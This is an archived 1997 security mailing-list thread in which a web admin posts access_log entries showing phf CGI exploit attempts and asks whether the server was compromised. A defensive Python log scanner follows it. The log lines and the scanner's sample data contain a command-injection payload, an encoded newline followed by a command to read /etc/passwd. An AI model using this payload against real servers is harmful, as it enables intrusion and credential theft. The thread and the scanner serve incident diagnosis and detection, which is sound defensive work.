[5127] in WWW Security List Archive


RE: What's this ?

daemon@ATHENA.MIT.EDU (Ben Camp)
Wed Apr 16 22:15:58 1997

From: Ben Camp <benc@gallerywatch.com>
To: "www-security@ns2.rutgers.edu" <www-security@ns2.rutgers.edu>,
        "'Chung-Rui Kao'" <kaoc@hep3.phys.sinica.edu.tw>
Date: Wed, 16 Apr 1997 17:26:27 -0500
Errors-To: owner-www-security@ns2.rutgers.edu

No.. someone did not hack your site.. 3 people did... or may have..

----------
From: 	Chung-Rui Kao
Sent: 	Wednesday, April 16, 1997 5:55 AM
To: 	www-security@ns2.rutgers.edu
Subject: 	What's this ?


  Dear Sir:

    What does it mean if you find such messages in your access_log?
    ps. my httpd is the NCSA version.

ip014.dialup.ntu.edu.tw - - [30/Jan/1997:18:50:58 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 644
ip010.dialup.ntu.edu.tw - - [01/Feb/1997:10:57:35 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 677
ogg081-025.resnet.wisc.edu - - [22/Feb/1997:01:21:32 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 681
192.192.98.116 - - [27/Mar/1997:19:17:43 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 759

    Besides, I hope to know how I can prove whether there is someone who
    tried to hack or had hacked my WWW server. My old httpd was the NCSA
    HTTPd 1.3. As the document on NCSA's official site said, if there are
    control codes in the access then someone has attempted to hack your server.
    There aren't any control codes in my access_log file, but I doubt someone
    hacked my server through the httpd daemon, and I hope someone can help me
    to prove that.

    Thank you.
    4/16'97
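
An added example, not part of either poster's message: a small Python scanner for the check asked about above. It parses Common Log Format lines, URL-decodes each request, and reports those carrying control characters, which in the phf entries exist only in encoded form (%0a) and so are not visible as raw control codes. The sample log reuses two lines from the post plus two constructed ones; the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD url PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)$')

# First two lines are copied from the post; the last two are constructed.
SAMPLE = """\
ip014.dialup.ntu.edu.tw - - [30/Jan/1997:18:50:58 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 644
192.192.98.116 - - [27/Mar/1997:19:17:43 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 759
host1.example.org - - [28/Mar/1997:09:00:01 +0800] "GET /index.html HTTP/1.0" 200 1024
host2.example.org - - [28/Mar/1997:09:00:05 +0800] "GET /cgi-bin/search?q=a%20b HTTP/1.0" 404 210
"""

def control_chars(text):
    """Return the ASCII control characters (0x00-0x1f, 0x7f) found in text."""
    return {c for c in text if ord(c) < 0x20 or ord(c) == 0x7F}

def scan(log_text):
    """Return one finding per request whose decoded URL holds control characters."""
    findings = []
    for line in log_text.split("\n"):
        m = CLF.match(line)
        if not m:
            continue  # blank or non-CLF line
        host, when, method, url, status, _size = m.groups()
        decoded = unquote(url)  # turns %0a into a real newline, %20 into a space
        ctl = control_chars(decoded)
        if not ctl:
            continue
        findings.append({
            "host": host,
            "time": when,
            "path": url.partition("?")[0],
            "decoded_url": decoded,
            "controls": sorted(hex(ord(c)) for c in ctl),
            "served": status.startswith("2"),  # server answered with 2xx
        })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["host"], f["time"], f["path"], f["controls"],
              "2xx" if f["served"] else "not 2xx", repr(f["decoded_url"]))
```

A 2xx status on a flagged line means the server answered the request; it does not by itself show what the CGI program did, so such lines are the ones to follow up on the host.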



